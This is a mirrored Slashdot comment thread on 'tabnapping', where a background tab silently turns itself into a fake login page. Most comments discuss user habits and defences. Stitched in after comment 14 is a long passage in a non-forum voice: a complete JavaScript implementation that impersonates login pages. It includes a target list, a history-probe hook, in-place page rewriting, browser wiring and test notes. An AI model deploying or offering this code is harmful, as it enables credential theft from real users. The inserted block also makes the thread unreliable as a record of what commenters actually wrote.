Slashdot Mirror


Tabnapping Scams Around the Corner?

scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)

39 of 362 comments

  1. Umm... by Pojut · · Score: 3, Insightful

    ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?

    1. Re:Umm... by mgblst · · Score: 5, Insightful

      What if they have it in another tab already? Then it would work.

      And if you use this for gmail, or facebook, tabs that people always have opened, it is going to get results.

      This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.

    2. Re:Umm... by Anonymous Coward · · Score: 3, Insightful

      I think what might be more disturbing is if the application looked at what url your other tabs are and redirected those sites to phishing sites that have copied the layout.

    3. Re:Umm... by commodore64_love · · Score: 2, Insightful

      Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen. And I would probably fall for it when, in about an hour, I go back to see it. I'd type in my name and password without realizing a thief was watching.

      --
      "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
    4. Re:Umm... by fuzzyfuzzyfungus · · Score: 3, Interesting

      P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

      Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.

      Your competent power user, on the other hand, may not fall for the trivial cases (two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be a totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.

      Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way (unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.

    5. Re:Umm... by mcgrew · · Score: 3, Informative

      P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

      No, that was Abraham Lincoln, who said "you can fool some of the people all of the time, and all of the people some of the time, but you can't fool all of the people all of the time."

      PT Barnum said "there's a sucker born every minute." And both he and Lincoln were correct.

    6. Re:Umm... by delinear · · Score: 2, Interesting

      I bank with HSBC, which is by no means a little no-name bank, and they let me log in with just typed credentials (account details and three digits of a 6-9 digit pin). I wish they'd back this up with some kind of dongle authentication, like other banks, but their answer is to have me install some rubbish plugin if I want added security, which I can't always do if I'm using different machines, working off site, etc. so I have little choice (other than the hassle of changing banks) than to accept their requirements. I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.

      It seems to me that online security is being loosened rather than tightened, in the name of providing more freedom to users (in other words just not making them jump through a couple more hoops to protect their life savings) - simple text entry, banking on mobile phones, isn't all this just asking for trouble? Ten years ago I could create one-time debit/credit card accounts with a fixed maximum or that expired after X payments or that could only be charged by client Y, etc and yet I have a hard time finding any of that from the major banks today.

    7. Re:Umm... by nabsltd · · Score: 2, Informative

      PT Barnum said "there's a sucker born every minute."

      No, he didn't.

    8. Re:Umm... by Qzukk · · Score: 2, Interesting

      user actually changed tab?

      window.onblur()

      Being somebody who got 20-30 tabs up and running along with massive tab switching I can't see how I would not spot that it's forcefully reloaded and wrong?

      Do you know for certain, without looking, what is in tab #8 right this instant? If you had to look, then if you didn't read the exact URL you just lost. If you didn't have to look or you looked at the URL instead of just the title or the icon on the tab, then you would realize that tab #8 was wrong and you would be immune.

      I think the majority of people would fall for it, even if they only had three or four tabs open instead of 20-30.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
  2. Sneaky... by fuzzyfuzzyfungus · · Score: 3, Interesting

    Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

    And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common (if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.

    You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.

  3. This is one of those stupidly smart things. by Securityemo · · Score: 3, Informative

    You see this, and think "Why didn't someone think about this before?"

    --
    Emotions! In your brain!
    1. Re:This is one of those stupidly smart things. by supersloshy · · Score: 2, Interesting

      You see this, and think "Why didn't someone think about this before?"

      Tab Mix Plus has had locked tabs for a while now. I'm not entirely sure if this fixes the issue of tabnapping, but it looks like it might.

      --
      "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
    2. Re:This is one of those stupidly smart things. by ShadowRangerRIT · · Score: 2, Informative

      To be clear, this isn't manipulating another tab. The sequence of events is:
      1. User opens link to seemingly innocuous but malicious site in Tab 1
      2. User goes to Tab 2 to do some other work (tab 2 is immaterial to this; it would work just as well if they switched to another application long enough to forget what they were doing in the browser)
      3. Malicious site in Tab 1 detects that it is unobserved, and replaces itself with a seemingly legitimate log-in page; this need not require a refresh with appropriately designed CSS and JavaScript, so you won't even see any action in the tab bar if you happen to be looking.
      4. User returns to Tab 1, assumes he opened the log-in screen for some reason and enters user name and password

      Now, in a two tab scenario, this sequence of events is unlikely. But for a user with 30 tabs open, there is a non-negligible chance that they forget what was on tab 17, and assume they had some reason to log-in to that site. People are really good at justifying actions that make no sense; just because they don't remember opening the site doesn't mean they won't come up with a reason why they would have. If they aren't aware of this exploit and forgot what was on the tab, they'd have little reason to be suspicious.

      Basically, this isn't a Firefox specific exploit. Any tabbed browser that doesn't disable all JavaScript by default will behave this way. NoScript and similar extensions will help, but a clever website designer might design the page to be useless without JavaScript. There are enough websites like that that a sufficiently interested user might whitelist it, if only temporarily, and some small percentage of those users may succumb to the trap.

      --
      $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
    3. Re:This is one of those stupidly smart things. by Garble+Snarky · · Score: 2, Informative

      The locking prevents the user from navigating to another page. I don't think it has any effect on scripts that were initially loaded with the page.

  4. Re:We need death squads by PhongUK · · Score: 3, Funny

    How do we identify them?

  5. disabling scripts on unfocused tabs? by roman_mir · · Score: 4, Interesting

    Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.

    But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.

    1. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 2, Insightful

      white listing is not an impossible concept, or is it?

    2. Re:disabling scripts on unfocused tabs? by Lunix+Nutcase · · Score: 2

      Do you think that a dialog, warning a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-listing the site if the 'allow always' button is pushed is such an outrageous concept?

      Yes. That would be a huge annoyance to many users similar to all the UAC dialogs in Vista.

    3. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 2, Interesting

      sure, there is also a possibility of a delayed HTTP response to a request, a so-called server push.

  6. Not exactly. by khasim · · Score: 3, Informative

    Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen.

    Not exactly. From his page on this "exploit"...

    You can try it out on this very website (I've only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.

    It's hard to find, isn't it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.

    So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

    1. Re:Not exactly. by jandrese · · Score: 2, Insightful

      The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.

      Even before tabbed browsing was popular, you could have done this with minimized or backgrounded windows too. To me the big problem is that he has to create a site that people will feel compelled to leave open while they go off and do something else. That will probably be the most difficult part.

      --
      I read the internet for the articles.
    2. Re:Not exactly. by WrongSizeGlass · · Score: 4, Interesting

      So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

      Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.

  7. Noscript by Wonko+the+Sane · · Score: 3, Informative

    This attack only works if you allow Javascript by default, instead of only whitelisting sites that you trust.

  8. Re:So let me get this straight... by The+MAZZTer · · Score: 3, Informative

    Some people keep 100s of tabs open. They could come back hours later and see a Gmail login screen and assume they opened it at some point.

  9. Re:A little peeved! by clickety6 · · Score: 5, Insightful

    First tab-nabbing and now submission-nabbing where the link in the article changes after submission!

    --
    ----------------------------------- My Other Sig Is Hilarious -----------------------------------
  10. Re:A little peeved! by mysidia · · Score: 5, Insightful

    Slashdot is about news, not driving traffic to someone's website.

    And 'getting traffic' is not some kind of exchange or reward offered for submitting an article.

    If a different link is editorially better, then it is expected that the editors will swap it.

  11. Re:We need death squads by AndrewBC · · Score: 2, Funny

    New plan: steal my own identity sloppily under the guise of your identity which I stole perfectly. Now polish my boots!

  12. Server delayed HTTP response as a push by roman_mir · · Score: 2, Interesting

    Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?

    It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.

  13. Re:A little peeved! by Anonymous Coward · · Score: 3, Insightful

    Regardless of which link is in the story, I still greatly benefit from you having taken the time to write the blog post and submit it to slashdot. Thank you for that.

    Oh, you meant benefit to you! What do you think slashdot is? Just a way to generate eyeballs for your personal blog? Screw you for that.

  14. Re:Tabnapping by WrongSizeGlass · · Score: 2, Informative

    Changing it when you're not looking is done very easily:
    var TIMER;
    window.onblur = function () {
      TIMER = setTimeout(changeItUp, 5000);
    };

    BTW, this isn't just a Firefox issue, he's only tested it in Firefox. It also works in Safari and IE 7 but didn't take in Chrome 5 (Mac).
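    The blur-timer swap sketched in the snippet above, and the four-step sequence ShadowRangerRIT describes further up, put into one complete form as an added example. This is my own illustration, not Raskin's proof of concept and not code anyone posted in this thread. The logic is kept separate from the DOM so the same code runs in a browser or under Node with a manual clock: createTabnabber takes an env adapter (an assumed interface with getTitle/setTitle, getFavicon/setFavicon, getPage/render, setTimeout/clearTimeout), waits until the tab has been unobserved for delayMs, then rewrites title, favicon and body in place (no navigation, so no tab-bar activity, which is why a "locked" tab does not help), and cancels if focus returns first. chooseTarget shows how the :visited probe mentioned later in the thread would pick which login page to imitate; the probe itself is injected as isVisited, because the 2010-era trick (style a:visited and read getComputedStyle) is deliberately neutralised by current browsers, which report the unvisited style. The target list, the site names and attachToWindow are hypothetical.

```javascript
'use strict';

// Constructed list of sites the fake page could impersonate. The "page"
// strings stand in for a full HTML/CSS replica of the real login form.
// Hypothetical data, not taken from the thread.
const TARGETS = [
  { name: 'webmail', url: 'https://mail.example.test/', favicon: '/mail.ico',
    title: 'Example Mail: Sign in', page: '<form>...mail login...</form>' },
  { name: 'social', url: 'https://social.example.test/', favicon: '/social.ico',
    title: 'Social: Log in', page: '<form>...social login...</form>' },
];

// Pick the first target the victim has visited, else the first in the list.
// isVisited is injected: the historical probe styled a:visited and read
// getComputedStyle(a).color; browsers now return the unvisited style on
// purpose, so that probe no longer works and is not implemented here.
function chooseTarget(targets, isVisited) {
  return targets.find((t) => isVisited(t.url)) || targets[0];
}

// Core of the attack as a small state machine. env abstracts the DOM and
// timers so the logic is identical in a browser and under a test.
function createTabnabber(env, target, delayMs) {
  const original = { title: env.getTitle(), favicon: env.getFavicon(), page: env.getPage() };
  let timer = null;
  let swapped = false;

  // Rewrite the page in place: no navigation, so nothing flickers in the tab bar.
  function swap() {
    timer = null;
    env.setTitle(target.title);
    env.setFavicon(target.favicon);
    env.render(target.page);
    swapped = true;
  }

  return {
    // Tab lost focus: start counting. The delay exists because brief blurs
    // (clicking the address bar, a popup) should not trigger the swap.
    onBlur() {
      if (!swapped && timer === null) timer = env.setTimeout(swap, delayMs);
    },
    // Focus came back before the timer fired: cancel, page stays innocuous.
    onFocus() {
      if (timer !== null) { env.clearTimeout(timer); timer = null; }
    },
    isSwapped() { return swapped; },
    original,
  };
}

// Minimal fake environment with a manual clock, so the attack logic can be
// exercised offline in Node without a DOM.
function fakeEnv() {
  const state = { title: 'Harmless article', favicon: '/site.ico', page: '<p>cats</p>' };
  const pending = new Map();
  let now = 0;
  let nextId = 1;
  return {
    state,
    getTitle: () => state.title,
    getFavicon: () => state.favicon,
    getPage: () => state.page,
    setTitle: (t) => { state.title = t; },
    setFavicon: (f) => { state.favicon = f; },
    render: (p) => { state.page = p; },
    setTimeout(fn, ms) { const id = nextId++; pending.set(id, { at: now + ms, fn }); return id; },
    clearTimeout(id) { pending.delete(id); },
    // Move the clock forward and fire every timer that is now due.
    advance(ms) {
      now += ms;
      for (const [id, t] of [...pending]) {
        if (t.at <= now) { pending.delete(id); t.fn(); }
      }
    },
  };
}

// Browser wiring (hypothetical helper; only runs where window exists).
function attachToWindow(win, target, delayMs) {
  const doc = win.document;
  const link = doc.querySelector('link[rel~="icon"]');
  const env = {
    getTitle: () => doc.title, setTitle: (t) => { doc.title = t; },
    getFavicon: () => (link ? link.href : ''), setFavicon: (f) => { if (link) link.href = f; },
    getPage: () => doc.body.innerHTML, render: (p) => { doc.body.innerHTML = p; },
    setTimeout: win.setTimeout.bind(win), clearTimeout: win.clearTimeout.bind(win),
  };
  const nab = createTabnabber(env, target, delayMs);
  win.addEventListener('blur', () => nab.onBlur());
  win.addEventListener('focus', () => nab.onFocus());
  return nab;
}

if (typeof window !== 'undefined') {
  attachToWindow(window, chooseTarget(TARGETS, () => false), 5000);
}
if (typeof module !== 'undefined') {
  module.exports = { TARGETS, chooseTarget, createTabnabber, fakeEnv, attachToWindow };
}
```

    Two points worth noting from running it: the swap is a pure in-page rewrite, so neither a tab lock nor a navigation-blocking extension sees anything, which matches TaoPhoenix's Tab Mix Plus result below; and the only state the page needs from the victim is "has this tab been unobserved for N seconds", which blur/focus events (and today document.visibilityState) hand out freely.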

  15. Re:A little peeved! by Anonymous Coward · · Score: 2, Insightful

    I agree it was transparently disrespectful of CmdrTaco to approve your submission, but with someone else's link. However:

    1. The linked article predates your linked blog according to the submission timestamps on each blog
    2. The linked article contains further links to relevant information, including a link to the original subject's website and a proof-of-concept site.

    I understand the euphoric feeling you got when your submission was accepted, and I also understand that sinking sensation you felt when you realized your blog was not linked-to even though your submission was accepted. That being said, repackaged news is repackaged news is repackaged news and I don't think you will find much sympathy around here that your (arguably, less useful) brand of news repackaging won't be netting you ad dollars like you intended.

  16. Re:A little peeved! by mcgrew · · Score: 5, Insightful

    That's a valid reason for including the link and for being disappointed that it was replaced - isn't it?

    Not in my eyes it isn't, and I wish they'd do it more often -- like when the submission has ten ad-laden one-paragraph pages I wish they'd link to a single page view, whether that site or another. Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot. They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening.

    Be glad that they didn't rewrite the entire summary as they've done with some of my submissions.

    A submission is supposed to benefit the slashdot community, not the submitter. Too often people like you make submissions just to drive traffic to their own site for the money.

    Shame on you.

  17. Re: Tab Mix Plus doesn't work well enough by TaoPhoenix · · Score: 2, Informative

    I tried it out and Protected/Froze/Locked the tab and the exploit ran.

    I think it's because the full contents were loaded and it didn't actually try to navigate anywhere.

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  18. Re:A little peeved! by Qzukk · · Score: 4, Insightful

    They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening

    They're not listening, the blog post they substituted is still just someone bloviating about the original article and proof of concept.

    In action, it's scary in a way that just listening to some blogger yak about it doesn't get the point across, and the author points out how to use the :visited detectors and various hacks to detect if you've logged into a site or not to make it even scarier.

    --
    If I have been able to see further than others, it is because I bought a pair of binoculars.
  19. Re:So let me get this straight... by Qzukk · · Score: 2, Informative

      No, tab 1 is still the same site as ever, but the page you visited in tab 34 and forgot about 30 minutes ago suddenly looks like a facebook "you have timed out please log in" page. It even uses javascript to change the title of the tab and the favicon.

    Pop Quiz! Were you logged into Facebook on tab 48, tab 18, or tab 42???!?!

    All it takes is a bit of javascript inserted into a normal site using cross-site scripting, or an intentionally malicious site in the first place, or an adserver serving up whatever javascript anyone pays them to host. This is why I use NoScript.

    The original author (not linked in the submission) points out that you can use the :visited hack to choose a login screen that the user would expect to see. And you can use various other hacks to determine if the user is currently logged into some site or not.

    --
    If I have been able to see further than others, it is because I bought a pair of binoculars.
  20. Re:A little peeved! by satoshi1 · · Score: 2, Funny

    Because you're being a selfish prick.

  21. Re:A little peeved! by scamdetect · · Score: 3, Funny

    Because you're being a selfish prick.

    I truly value your input. Thank you.

  22. Re:if these geniuses by Garble+Snarky · · Score: 2, Insightful

    A legitimate purpose like, say, significant development work on a well-known, large-scale open source project, such as Firefox?

    All you had to read was the first sentence of the summary...

  23. Re:So let me get this straight... by Hurricane78 · · Score: 2, Insightful

      And it'd be their own damn fault for having such a mess.
      Seriously? You need hundreds of tabs? Did you never hear of doing first things first, and freeing your mind from other stuff? Did they never hear of bookmarks, bookmark folders and saving sessions (e.g. with TabMix Plus)?

      Sorry, but there's a point at which you just deserve it. This is one of them. Like cockroaches in an apartment that looks like a garbage dump.

    --
    Any sufficiently advanced intelligence is indistinguishable from stupidity.